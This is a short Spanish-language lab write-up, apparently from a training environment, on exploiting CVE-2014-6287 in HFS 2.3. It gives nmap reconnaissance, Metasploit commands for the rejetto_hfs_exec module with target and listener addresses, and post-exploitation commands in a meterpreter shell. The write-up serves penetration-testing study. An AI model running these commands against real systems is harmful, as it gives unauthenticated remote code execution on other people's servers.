
Metasploit RCE en HFS 2.3 - CVE-2014-62
Metasploit RCE en HFS 2.3 - CVE-2014-62
🔖 Título del Proyecto
> Ejecución Remota de Código a través de HTTP File Server (HFS 2.3)
⚙ Herramientas Utilizadas • Kali Linux • Nmap • Metasploit • Objetivo: HFS 2.3 en Windows 7
🔐 Detalles de la Vulnerabilidad • Nombre: CVE-2014-6287 • Tipo: Ejecución Remota de Código • Causa: Entrada no validada en scripts de HFS • Impacto: Acceso a shell sin autenticación
🔍 Metodología (Paso a Paso)
🔹 Paso 1: Recopilación de Información (Nmap)
• nmap -sV demo.ine.local (ip del objetivo)
• puerto abierto encontrado: 80
• servicio: rejetto HTTP file server 2.3

🔹 Paso 2: Explotación (Metasploit)
• Msfconsole
• Buscar HFS o rejetto
• use exploit/windows/http/rejetto_hfs_exec
• set RHOST 192.168.1.100
• set RPORT 80
• set LHOST 192.168.1.101
• run
Exploit
🔹 Paso 3: Post-Explotación
después de ejecutar, obtendrás una sesión de meterpreter usa el comando: shell
• whoami • ipconfig • dir

**